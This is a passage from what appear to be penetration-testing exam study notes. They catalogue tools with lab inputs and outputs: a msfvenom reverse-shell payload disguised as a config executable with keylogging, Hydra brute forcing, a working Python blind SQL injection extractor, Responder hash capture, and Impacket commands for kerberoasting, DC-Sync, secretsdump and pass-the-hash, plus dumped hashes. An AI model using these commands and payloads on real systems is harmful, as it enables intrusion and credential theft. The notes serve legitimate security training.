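SEVERITY_RANK = {"UNKNOWN": 0, "LOW": 1, "MEDIUM": 2, "HIGH": 3, "CRITICAL": 4}

REPORT = json.dumps({
    "ArtifactName": "sagikazarmark/dvwa",
    "Results": [
        {
            "Target": "sagikazarmark/dvwa (debian 8.7)",
            "Vulnerabilities": [
                {"VulnerabilityID": "CVE-2017-3167", "PkgName": "apache2",
                 "InstalledVersion": "2.4.10-10+deb8u8", "FixedVersion": "2.4.10-10+deb8u9",
                 "Severity": "CRITICAL", "Title": "httpd: ap_get_basic_auth_pw() authentication bypass"},
                # constructed: HIGH with no FixedVersion at all
                {"VulnerabilityID": "EXAMPLE-0001", "PkgName": "libexample",
                 "InstalledVersion": "1.0", "Severity": "HIGH", "Title": "constructed: no fix available"},
                # constructed: fixable but LOW
                {"VulnerabilityID": "EXAMPLE-0002", "PkgName": "libexample",
                 "InstalledVersion": "1.0", "FixedVersion": "1.1",
                 "Severity": "LOW", "Title": "constructed: low severity"},
            ],
        },
        {
            "Target": "Covenant.deps.json", "Type": "dotnet-core",
            "Vulnerabilities": [
                {"VulnerabilityID": "CVE-2021-34532",
                 "PkgName": "Microsoft.AspNetCore.Authentication.JwtBearer",
                 "InstalledVersion": "3.1.3", "FixedVersion": "2.1.29, 3.1.18, 5.0.9",
                 "Severity": "MEDIUM", "Title": "dotnet: ASP.NET Core JWT token logging"},
            ],
        },
    ],
})


def gate(report_json, fail_on=("CRITICAL", "HIGH"), ignore_unfixed=True):
    """Return (ok, blocking, advisory): blocking rows fail the build."""
    report = json.loads(report_json)
    blocking, advisory = [], []
    for result in report.get("Results", []):
        # "Vulnerabilities" is omitted entirely for clean targets, hence `or []`
        for v in result.get("Vulnerabilities") or []:
            fixed = v.get("FixedVersion", "")
            row = {"target": result.get("Target"), "id": v["VulnerabilityID"],
                   "pkg": v["PkgName"], "installed": v["InstalledVersion"],
                   "fixed": fixed, "severity": v.get("Severity", "UNKNOWN")}
            if row["severity"] in fail_on and (fixed or not ignore_unfixed):
                blocking.append(row)
            else:
                advisory.append(row)
    blocking.sort(key=lambda r: -SEVERITY_RANK.get(r["severity"], 0))
    return not blocking, blocking, advisory


def summarize(report_json):
    """Severity counts, in the spirit of Trivy's 'Total:' line."""
    counts = {k: 0 for k in SEVERITY_RANK}
    for result in json.loads(report_json).get("Results", []):
        for v in result.get("Vulnerabilities") or []:
            counts[v.get("Severity", "UNKNOWN")] += 1
    return counts


if __name__ == "__main__":
    ok, blocking, advisory = gate(REPORT)
    print("Total:", summarize(REPORT))
    for r in blocking:
        print(f"BLOCK {r['severity']:8} {r['id']:16} {r['pkg']} {r['installed']} -> {r['fixed']}")
    print(f"{len(advisory)} advisory finding(s)")
    raise SystemExit(0 if ok else 1)
```

    Run it against a real report with `trivy image --format json -o report.json IMAGE` and `gate(open("report.json").read())`. Ignoring unfixed findings mirrors Trivy's own `--ignore-unfixed` flag; flip ignore_unfixed=False when the policy is "no known critical exposure at all", which is the stricter reading a pentest report usually takes.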
    
    

9. Kube-hunter

  • Use Case: Probe Kubernetes clusters for common exposures (anonymous kubelet, dashboard, etc.). Github

  • NB: no longer maintained; the project recommends Trivy instead.

  • Input Example:

    kube-hunter
    
    Choose one of the options below:
    1. Remote scanning      (scans one or more specific IPs or DNS names)
    2. Interface scanning   (scans subnets on all local network interfaces)
    3. IP range scanning    (scans a given IP range) 
    Your choice:
    
    
    kube-hunter --remote 10.80.128.251
    
    kube-hunter --pod
    
  • Output Example:

    Your choice: 3
    CIDR separated by a ',' (example - 192.168.0.0/16,!192.168.0.8/32,!192.168.1.0/24): 10.80.128.251
    2025-11-20 15:43:43,380 INFO kube_hunter.modules.report.collector Started hunting
    2025-11-20 15:43:43,380 INFO kube_hunter.modules.report.collector Discovering Open Kubernetes Services
    2025-11-20 15:43:43,468 INFO kube_hunter.modules.report.collector Found open service "Unrecognized K8s API" at 10.80.128.251:6443
    
    Nodes
    +-------------+---------------+
    | TYPE        | LOCATION      |
    +-------------+---------------+
    | Node/Master | 10.80.128.251 |
    +-------------+---------------+
    
    Detected Services
    +----------------------+--------------------+----------------------+
    | SERVICE              | LOCATION           | DESCRIPTION          |
    +----------------------+--------------------+----------------------+
    | Unrecognized K8s API | 10.80.128.251:6443 | A Kubernetes API     |
    |                      |                    | service              |
    +----------------------+--------------------+----------------------+
    
    No vulnerabilities were found
    
    

🧪 Tips (Exam‑useful)

  • Always confirm CVEs against NVD for accuracy.
  • Authenticated scans give deeper results than unauthenticated.
  • False positives common in Nikto—manual verification needed.

Domain 4.0 Tools and Examples

1. Metasploit

  • Use Case: Exploit execution. Rapid7

  • Also see Msfvenom

  • Input Example:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.2.20.215 LPORT=4444 -f exe > sharedrive_config.exe
    
    # Start the handler from the command line; msfconsole's set syntax is "set NAME VALUE"
    msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 10.2.20.215; set LPORT 4444; exploit"
    
    
  • Output Example:

    meterpreter
    # Once reverse shell is established:
    meterpreter > keyscan_start
    Starting the keystroke sniffer...
    [...]
    meterpreter > keyscan_dump
    Dumping captured keystrokes...
    password1334<CR>
    
    meterpreter >
    

2. Hydra

  • Use Case: Brute-force login. Github

  • Input Example:

    hydra -l [email protected] -P passwords.txt smtps://10.10.144.205
    
    hydra -L usernames-list.txt -P seasons-exp.txt ssh://10.10.81.19
    
    hydra -l phillips -P wordlist.txt -V 10.10.144.205 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php"
    
    # brute-force BASIC AUTH page (/protected)
    hydra -l bob -P /usr/share/wordlists/rockyou.txt 10.10.131.92 http-get /protected
    
  • Output Example:

    
    [DATA] attacking smtps://10.10.144.205:465/
    [465][smtp] host: 10.10.144.205   login: [email protected]   password: !multidisciplinary00
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-08 10:36:48
    
    
    
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 200 login tries (l:5/p:40), ~13 tries per task
    [DATA] attacking ssh://10.10.81.19:22/
    [22][ssh] host: 10.10.81.19   login: burgess   password: Fall2021@
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-08 11:50:35
    
    
    
    [...]
    [ATTEMPT] target 10.10.144.205 - login "phillips" - pass "clinical" - 29 of 106 [child 13] (0/0)
    [ATTEMPT] target 10.10.144.205 - login "phillips" - pass "innovative" - 30 of 106 [child 15] (0/0)
    [80][http-get-form] host: 10.10.144.205   login: phillips   password: Paracetamol
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-08 11:10:58
    
    
    
    [...]
    [DATA] attacking http-get://10.10.131.92:80/protected
    [80][http-get] host: 10.10.131.92   login: bob   password: bubbles
    1 of 1 target successfully completed, 1 valid password found
    
    

3. sqlmap

  • Use Case: SQL injection exploitation. Github

  • Input Example:

    sqlmap -r api-req.txt --dbs
    
    sqlmap -r api-req.txt -D vn_admin --tables
    
    # Request captured from https://tryhackme.com/room/vulnnetendgame and saved to api-req.txt, to determine whether the blog parameter is injectable
    
    GET /vn_internals/api/v2/fetch/?blog=1 HTTP/1.1
    Host: api.vulnnet.thm
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    Priority: u=0, i
    
    
  • Output Example:

    [15:10:53] [INFO] heuristic (basic) test shows that GET parameter 'blog' might be injectable
    [15:10:53] [INFO] testing for SQL injection on GET parameter 'blog'
    [15:10:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [15:10:53] [INFO] GET parameter 'blog' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
    [...]
    sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests:
    ---
    Parameter: blog (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: blog=1 AND 3391=3391
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: blog=1 AND (SELECT 7819 FROM (SELECT(SLEEP(5)))swed)
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 3 columns
        Payload: blog=-7358 UNION ALL SELECT CONCAT(0x717a706271,0x6a6849505479467174526363464658775347754d4f79626752444172587875746e4e464e766b766a,0x717a786271),NULL,NULL-- -
    ---
    [15:11:29] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    [15:11:29] [INFO] fetching database names
    [15:11:29] [INFO] retrieved: 'information_schema'
    [15:11:29] [INFO] retrieved: 'blog'
    [15:11:29] [INFO] retrieved: 'vn_admin'
    available databases [3]:                                                                                                                 
    [*] blog
    [*] information_schema
    [*] vn_admin
    [...]
    
    
    
    [...]
    Database: vn_admin                                                                                                                       
    [48 tables]
    +---------------------------------------------+
    | backend_layout                              |
    | be_dashboards                               |
    | be_groups                                   |
    | be_sessions                                 |
    | be_users                                    |
    [...]
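
  • Worked example (added here, not sqlmap's code): the first injection point sqlmap reported above is boolean-based blind, so it is worth seeing what that actually does under the hood. A deliberately vulnerable endpoint built on an in-memory SQLite database stands in for /vn_internals/api/v2/fetch/?blog=N, and the extractor recovers a string one character at a time with the same trick sqlmap used (blog=1 AND 3391=3391 versus a false condition): the post either renders or it does not, and that single bit, driven by a binary search over character codes, leaks the data. The schema, rows and table names are constructed for the demo; the parameterised version alongside shows the fix.

```python
"""Boolean-based blind SQL injection, end to end (added example, not sqlmap).

The endpoint, schema and rows are constructed for the demo. SQLite stands
in for the MySQL back end identified above.
"""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE blog_posts (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
    CREATE TABLE be_users (uid INTEGER PRIMARY KEY, username TEXT, password TEXT);
    INSERT INTO blog_posts VALUES (1, 'Welcome', 'first post');
    INSERT INTO be_users VALUES (1, 'admin', 'constructed-secret');
""")


def fetch_blog_vulnerable(blog):
    """The bug: the query-string value is pasted straight into the SQL text."""
    sql = f"SELECT title, body FROM blog_posts WHERE id = {blog}"
    return conn.execute(sql).fetchall()


def fetch_blog_fixed(blog):
    """The fix: the value travels as a bound parameter and is never parsed as SQL."""
    return conn.execute("SELECT title, body FROM blog_posts WHERE id = ?", (int(blog),)).fetchall()


def oracle(condition):
    """True iff the injected condition holds; models 'did the post render?'."""
    return len(fetch_blog_vulnerable(f"1 AND ({condition})")) > 0


def blind_extract(subquery, max_len=64):
    """Recover the string returned by subquery using only the yes/no oracle."""
    # 1. length first (binary search over 0..max_len) so we know when to stop
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length(({subquery})) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    length = lo
    # 2. each character by binary search over its code point (printable ASCII)
    out = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    print("true  condition:", fetch_blog_vulnerable("1 AND 3391=3391"))
    print("false condition:", fetch_blog_vulnerable("1 AND 3391=3392"))
    print("first table:", blind_extract("SELECT name FROM sqlite_master WHERE type='table' ORDER BY name LIMIT 1"))
    print("admin pw:   ", blind_extract("SELECT password FROM be_users WHERE username='admin'"))
```

    Each character costs about seven oracle calls, which is why sqlmap reports request counts and prefers a UNION or error-based technique when one is available; the blind path is the fallback that still works when nothing from the query is echoed back. On MySQL the equivalent probes use LENGTH(), SUBSTRING() and ASCII().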
    
    

4. Burp Suite

  • Use Case: Web app testing & interception.

  • Input Example: Proxy intercept enabled

  • Output Example: Captured HTTP requests for manipulation


5. John the Ripper

  • Use Case: Password cracking that supports custom rules. Github

  • Input Example:

    /etc/john/john.conf
    [...]
    [List.Rules:StrikeSec]
    Az"[0-9]" ^[!@#$]
    [...]
    
    
    john --wordlist=/tmp/just-the-word-password.txt --rules=StrikeSec --stdout
    
    john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
    
  • Output Example:

    
    Using default input encoding: UTF-8
    !password0
    @password0
    #password0
    $password0
    !password1
    [...]
    
    
    
    Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
    Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
    [...] 
    Using default input encoding: UTF-8
    Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
    Warning: no OpenMP support for this hash type, consider --fork=2
    Press 'q' or Ctrl-C to abort, almost any other key for status
    sunshine         (?)
    1g 0:00:00:00 DONE (2025-11-07 17:18) 8.333g/s 266.6p/s 266.6c/s 266.6C/s tigger..butterfly
    Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
    Session completed. 
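
  • Worked example (added here, not John the Ripper's code): the --stdout run above shows how John's preprocessor expands a rule with character classes, with the first class varying slowest (!password0, @password0, #password0, $password0, then !password1). The small interpreter below reproduces that expansion for a subset of the rule language (Az"STR" and A0"STR", ^X, $X, l, u, c, r and [..] classes, including ranges) and also builds the kind of Season+Year base list that fed the Hydra SSH run earlier (seasons-exp.txt, which yielded Fall2021@). The rule subset and the base words are the assumptions; everything else follows the behaviour printed above.

```python
"""A subset of John the Ripper's rule language, with preprocessor expansion
(added example, not John's code). Covers: l u c r, ^X, $X, AN"STR" and
[..] character classes; the class ordering matches the --stdout output
shown above, where the first class varies slowest.
"""
import itertools
import re

CLASS_RE = re.compile(r"\[([^\]]+)\]")


def _expand_class(body):
    """'0-9' -> '0123456789', '!@#$' -> '!@#$' (ranges like a-z supported)."""
    out, i = [], 0
    while i < len(body):
        if i + 2 < len(body) and body[i + 1] == "-":
            out.extend(chr(c) for c in range(ord(body[i]), ord(body[i + 2]) + 1))
            i += 3
        else:
            out.append(body[i])
            i += 1
    return "".join(out)


def preprocess(rule):
    """Yield every class-free rule the preprocessor would generate from `rule`."""
    parts = CLASS_RE.split(rule)            # literal, class1, literal, class2, ..., literal
    literals = parts[0::2]
    classes = [_expand_class(c) for c in parts[1::2]]
    for combo in itertools.product(*classes):   # first class varies slowest
        yield "".join(lit + ch for lit, ch in zip(literals, combo + ("",)))


def apply_rule(rule, word):
    """Apply one class-free rule to one word (supported command subset only)."""
    w, i = word, 0
    while i < len(rule):
        cmd = rule[i]
        if cmd in " :":                          # whitespace/no-op separators
            i += 1
        elif cmd == "l": w, i = w.lower(), i + 1
        elif cmd == "u": w, i = w.upper(), i + 1
        elif cmd == "c": w, i = w[:1].upper() + w[1:].lower(), i + 1
        elif cmd == "r": w, i = w[::-1], i + 1
        elif cmd == "^": w, i = rule[i + 1] + w, i + 2        # prefix one character
        elif cmd == "$": w, i = w + rule[i + 1], i + 2        # append one character
        elif cmd == "A":                                      # AN"STR": insert STR at N (z = end)
            pos, quote = rule[i + 1], rule[i + 2]
            end = rule.index(quote, i + 3)
            s = rule[i + 3:end]
            w = w + s if pos == "z" else w[:int(pos)] + s + w[int(pos):]
            i = end + 1
        else:
            raise ValueError(f"unsupported rule command {cmd!r} in {rule!r}")
    return w


def expand(rule, words):
    """John --stdout order: each generated rule applied to the whole wordlist in turn."""
    return [apply_rule(r, w) for r in preprocess(rule) for w in words]


def season_year_words(years=(2021, 2022)):
    """Constructed base list in the spirit of the seasons-exp.txt used with Hydra above."""
    return [f"{s}{y}" for y in years for s in ("Spring", "Summer", "Fall", "Winter")]


if __name__ == "__main__":
    for candidate in expand('Az"[0-9]" ^[!@#$]', ["password"])[:5]:
        print(candidate)
    print(expand("$[@!]", season_year_words())[:4])
```

    The point of the expansion order is practical: when a rules run is cut short, the candidates tried so far are "all symbols for digit 0" rather than "all digits for one symbol", so a partial run still covers a sensible slice of the keyspace.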
    
    

6. Responder

  • Use Case: LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. Github

  • Input Example:

    sudo responder -I breachad
    
  • Output Example:

    [+] Listening for events...
    
    [!] Error starting TCP server on port 80, check permissions or other servers running.
    [!] Error starting TCP server on port 3389, check permissions or other servers running.
    [!] Error starting TCP server on port 389, check permissions or other servers running.
    [SMB] NTLMv2-SSP Client   : ::ffff:10.200.4.202
    [SMB] NTLMv2-SSP Username : ZA\svcFileCopy
    [SMB] NTLMv2-SSP Hash     :   svcFileCopy::ZA:5969405a34cd[...]
    
    
    • The captured NetNTLMv2 hash can be cracked offline with hashcat mode 5600 (hashcat -m 5600 hash.txt wordlist.txt); the user::domain:challenge:proof:blob line is used as-is.

7. Netcat (nc)

  • Use Case: Banner grabbing, reverse/bind shells, simple TCP/UDP clients. User Guide

  • Input Example:

    # Banner grab
    nc -vn 10.10.1.171 80
    
    # Set up a listener (-l) on port 4444, verbose (-v), no DNS lookups (-n)
    # '-k' is listener-side only and its meaning depends on the netcat variant:
    # nc.traditional (whose help text is listed below) sets SO_KEEPALIVE on the socket,
    # while OpenBSD nc and ncat use -k to keep listening for new clients after one disconnects
    
    nc -k -lvnp 4444
    
    # Connect to listener
    # Cat the file to send, then the second cat waits for keyboard input
    # This way the connection doesn't close straight after the file is sent
    
    (cat file_to_send.txt; cat) | nc -v 127.0.0.1 4444
    
    # Set up a listener, and pipe received output to a file
    # This will contain the text that file_to_send.txt contains
    
    nc -lvnp 4444 > received_output.txt
    
    options (nc.traditional -h; OpenBSD nc and ncat have different flags):
          -c shell commands       as `-e'; use /bin/sh to exec [dangerous!!]
          -e filename             program to exec after connect [dangerous!!]
          -b                      allow broadcasts
          -g gateway              source-routing hop point[s], up to 8
          -G num                  source-routing pointer: 4, 8, 12, ...
          -h                      this cruft
          -i secs                 delay interval for lines sent, ports scanned
          -k                      set keepalive option on socket
          -l                      listen mode, for inbound connects
          -n                      numeric-only IP addresses, no DNS
          -o file                 hex dump of traffic
          -p port                 local port number
          -r                      randomize local and remote ports
          -q secs                 quit after EOF on stdin and delay of secs
          -s addr                 local source address
          -T tos                  set Type Of Service
          -t                      answer TELNET negotiation
          -u                      UDP mode
          -v                      verbose [use twice to be more verbose]
          -w secs                 timeout for connects and final net reads
          -C                      Send CRLF as line-ending
          -z                      zero-I/O mode [used for scanning]
    
    
  • Output Example:

    (UNKNOWN) [10.10.1.171] 80 (http) open
    GET / HTTP/1.1
    
    HTTP/1.1 400 Bad Request
    Server: nginx/1.22.1
    Date: Fri, 07 Nov 2025 14:48:31 GMT
    Content-Type: text/html
    Content-Length: 157
    Connection: close
    
    <html>
    <head><title>400 Bad Request</title></head>
    <body>
    <center><h1>400 Bad Request</h1></center>
    <hr><center>nginx/1.22.1</center>
    </body>
    </html>
    
    

8. Impacket

  • Use Case: AD protocols abuse (SMB, MSRPC, LDAP, Kerberos) and lateral movement. Github

  • Input Example:

    # AS-REP Roasting a list of users
    # We can also specify -format john/hashcat to export the AS-REP hash in john or hashcat formats respectively.
    
    GetNPUsers.py -dc-ip 10.10.186.246 thm.red/ -usersfile /tmp/users.lst
    
    
    # Check for kerberoastable accounts
    # LDAP tools like `GetUserSPNs.py` can use Kerberos (`-k` flag), which is often more reliable in environments where:
    #   - NTLM is restricted
    #   - LDAP signing is enforced
    #   - DNS resolution is flaky
    
    GetUserSPNs.py controller.local/[email protected] -hashes :2777b7fec870e04dda00cd7260f7bee6 -no-pass -k -dc-ip 10.10.106.82
    
    # Kerberoasting - requesting TGS tickets
    
    GetUserSPNs.py controller.local/[email protected] -hashes :2777b7fec870e04dda00cd7260f7bee6 -no-pass -k -dc-ip 10.10.106.82 -request
    
    
    # Dumping the KRBTGT hash
    
    secretsdump.py 'controller.local/Administrator:P@$$W0rd'@10.10.175.51
    
    # Extracting SAM NTLM hashes from sam and system registry hives & shadow volume
    
    secretsdump.py -sam sam -system system LOCAL
    
    # Extracting NTDS
    
    secretsdump.py -security ./registry/SECURITY -system ./registry/SYSTEM -ntds ./'Active Directory'/ntds.dit local
    
    # Perform DC-Sync remotely
    
    secretsdump.py -just-dc-ntlm THM.red/[email protected]
    
    # Executing files over SMB from linux
    
    smbexec.py 'thm:Passw0rd!'@10.10.5.212
    
    # Relay captured NTLM authentication to the -t target
    
    ntlmrelayx.py -smb2support -t smb://10.200.72.201 -debug
    
    # Pass-the-hash
    
    psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8f81ee5558e2d1205a84d07b0e3b34f5 [email protected]
    
    # Serving files
    # Here the share name is “public”, located at “/root/share”
    
    smbserver.py -smb2support public /root/share -username THMBackup -password CopyMaster555
    
  • Output Example:

    # AS-REP Roasting a list of users - GetNPUsers.py
    
    [...]
    [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
    [-] User admin doesn't have UF_DONT_REQUIRE_PREAUTH set
    [-] User thm doesn't have UF_DONT_REQUIRE_PREAUTH set
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    [-] User sshd doesn't have UF_DONT_REQUIRE_PREAUTH set  [email protected]:677c3d66decbbef495bcb0529e1eae4b$1c5ed1ad7192d9641454cf2deedc0cb2f6e97db7df0b209413e2be8b00aea9c4126d804ce63085e3bf9dc46ceb24da44dd4806219d256bb53b6838bd8e8fa0e7d0f360d6cb497ba5d42233cbef2c84a64394600b7445a5fb326879eda561c7d57fe99e360db60d516b99fecf68510bc87907eff684ff3e2ee926c58c1b93b99852c6b364578e41c5bcd7d606753e4bb8210961d1c4cbd756a10d2551ebfe1ed28049e0a9fe3d77d6ff1412ce400340a39f1551045558f9f0c12329cc06a84177a50192a6f9fd8b19a90f704b5fdeabaa56e0dd60068a7fd3d8e7726e9f702efc6234
    [-] User CREDS-HARVESTIN$ doesn't have UF_DONT_REQUIRE_PREAUTH set
    root@ip-10-10-150-52:/tmp#
    
    
    # Check for kerberoastable accounts - GetUserSPNs.py
    
    Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
    
    [*] Getting machine hostname
    [-] CCache file is not found. Skipping...
    ServicePrincipalName                             Name         MemberOf                                                         PasswordLastSet             LastLogon                   Delegation 
    -----------------------------------------------  -----------  ---------------------------------------------------------------  --------------------------  --------------------------  ----------
    CONTROLLER-1/SQLService.CONTROLLER.local:30111   SQLService   CN=Group Policy Creator Owners,OU=Groups,DC=CONTROLLER,DC=local  2020-05-25 23:28:26.922527  2020-05-25 23:46:42.467441             
    CONTROLLER-1/HTTPService.CONTROLLER.local:30222  HTTPService                                                                   2020-05-25 23:39:17.578393  2020-05-25 23:40:14.671872             
    
    root@ip-10-10-177-75:/opt/impacket/examples# 
    
    
    # Kerberoasting - requesting TGS tickets - GetUserSPNs.py
    
    [...]
    [*] Getting machine hostname
    [-] CCache file is not found. Skipping...
    ServicePrincipalName                             Name         MemberOf                                                         PasswordLastSet             LastLogon                   Delegation 
    -----------------------------------------------  -----------  ---------------------------------------------------------------  --------------------------  --------------------------  ----------
    CONTROLLER-1/SQLService.CONTROLLER.local:30111   SQLService   CN=Group Policy Creator Owners,OU=Groups,DC=CONTROLLER,DC=local  2020-05-25 23:28:26.922527  2020-05-25 23:46:42.467441             
    CONTROLLER-1/HTTPService.CONTROLLER.local:30222  HTTPService                                                                   2020-05-25 23:39:17.578393  2020-05-25 23:40:14.671872             
    
    [-] CCache file is not found. Skipping...
    $krb5tgs$23$*SQLService$CONTROLLER.LOCAL$controller.local/SQLService*$6dec76a5974ec758041cd185ad73611b$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  
    $krb5tgs$23$*HTTPService$CONTROLLER.LOCAL$controller.local/HTTPService*$fbb22e10128330da53612b0abeef44b1$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
    
    root@ip-10-10-177-75:/opt/impacket/examples# 
    
    
    # Dumping the KRBTGT hash - secretsdump.py
    
    [*] Target system bootKey: 0x3793e46f2ffcf19c9060c058e1a8c4d7
    [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:2777b7fec870e04dda00cd7260f7bee6:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
    [*] Dumping cached domain logon information (domain/username:hash)
    [*] Dumping LSA Secrets
    [*] $MACHINE.ACC 
    CONTROLLER\CONTROLLER-1$:aes256-cts-hmac-sha1-96:b154757ed42fd39d373bb03f7d49ba42c7f90c6d2d6c72044b835f34df9fde6e
    CONTROLLER\CONTROLLER-1$:aes128-cts-hmac-sha1-96:0a2f696a1b5855a97de0ab300307bc2d
    CONTROLLER\CONTROLLER-1$:des-cbc-md5:fe0b101c7a1357f2
    CONTROLLER\CONTROLLER-1$:plain_password_hex:e075595bd6202a07ae5c685801d1baf40dc79e2ef7fbe45d72654cff2e27cd2c563ba37e8b29e1e5dd7ca5c35f0560067b2733cbe5664a8de7edd5e4a716f5a2648e7970ec406c685dd47c9037d885164b6cf93f2d425365749890921aa82a3054fd8e49a674914e6c831e9f55c98cdffc24749235e59a14d2c71d4cdad3e28048559764269f446ef5270e34388159d3828308de06a32f68aaa3d2f49c4ad0a0da10fd65c05760bf31341b459a027fd54bfd300ae0db8e8b7a374352908ff5d2b775ccb6f015b0251d3ca47a443c733052643ccfce71cffce86e6941727bfbe439f628f06d4a3edb6216950d434c7ca4
    CONTROLLER\CONTROLLER-1$:aad3b435b51404eeaad3b435b51404ee:811e021e0b4e1313d654b27f91e83c0d:::
    [*] DPAPI_SYSTEM 
    dpapi_machinekey:0x83f9488e2aeef29b354be313f76363f8e5770bf2
    dpapi_userkey:0x7c5d37fa459e37a1e9a3180c44092d5143490810
    [*] NL$KM 
     0000   68 09 BC 65 4B C4 62 83  B2 D1 FA B7 79 5B 82 86   h..eK.b.....y[..
     0010   41 7E 09 44 96 24 E4 86  A4 23 66 F2 94 C9 F1 5D   A~.D.$...#f....]
     0020   2D 1A 9D 14 B4 B3 35 54  27 B3 CB B1 E0 9A 26 82   -.....5T'.....&.
     0030   EB 40 75 72 EF 11 38 05  9C 50 E2 32 86 B1 FD CB   [email protected]....
    NL$KM:6809bc654bc46283b2d1fab7795b8286417e09449624e486a42366f294c9f15d2d1a9d14b4b3355427b3cbb1e09a2682eb407572ef1138059c50e23286b1fdcb
    [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
    [*] Using the DRSUAPI method to get NTDS.DIT secrets
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:2777b7fec870e04dda00cd7260f7bee6:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    krbtgt:502:aad3b435b51404eeaad3b435b51404ee:72cd714611b64cd4d5550cd2759db3f6:::
    CONTROLLER.local\Machine1:1103:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
    CONTROLLER.local\Machine2:1104:aad3b435b51404eeaad3b435b51404ee:c39f2beb3d2ec06a62cb887fb391dee0:::
    CONTROLLER.local\Admin1:1105:aad3b435b51404eeaad3b435b51404ee:3e920318c828abe5f652109e4ff0866d:::
    [...]
    [*] Kerberos keys grabbed
    Administrator:aes256-cts-hmac-sha1-96:42b3c13c8c0fef3175eb2b5926f805f919123efd001a9c5a16ee9a86101e32b4
    Administrator:aes128-cts-hmac-sha1-96:d01d6ccf97a2ee214ec7185173a3b659
    Administrator:des-cbc-md5:918abaf7dcb02ce6
    krbtgt:aes256-cts-hmac-sha1-96:dfb518984a8965ca7504d6d5fb1cbab56d444c58ddff6c193b64fe6b6acf1033
    krbtgt:aes128-cts-hmac-sha1-96:88cc87377b02a885b84fe7050f336d9b
    krbtgt:des-cbc-md5:79bf07137a8a6b8f
    CONTROLLER.local\Machine1:aes256-cts-hmac-sha1-96:63f8cf507d238bc84a2c0486dae6298d8823ae1565beb040393afc704c53acf3
    CONTROLLER.local\Machine1:aes128-cts-hmac-sha1-96:7db83a942d11c7441513c5c1f712319b
    [...]
    [*] Cleaning up... 
    root@ip-10-10-177-75:/opt/impacket/examples#
    
    
    # Extracting SAM NTLM hashes from sam and system registry hives & shadow volume - secretsdump.py
    
    [*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
    [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:98d3a787a80d08385cea7fb4aa2a4261:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
    [*] Cleaning up... 
    
    
    # Extracting NTDS - secretsdump.py
    
    [*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
    [*] Dumping cached domain logon information (domain/username:hash)
    [*] Dumping LSA Secrets
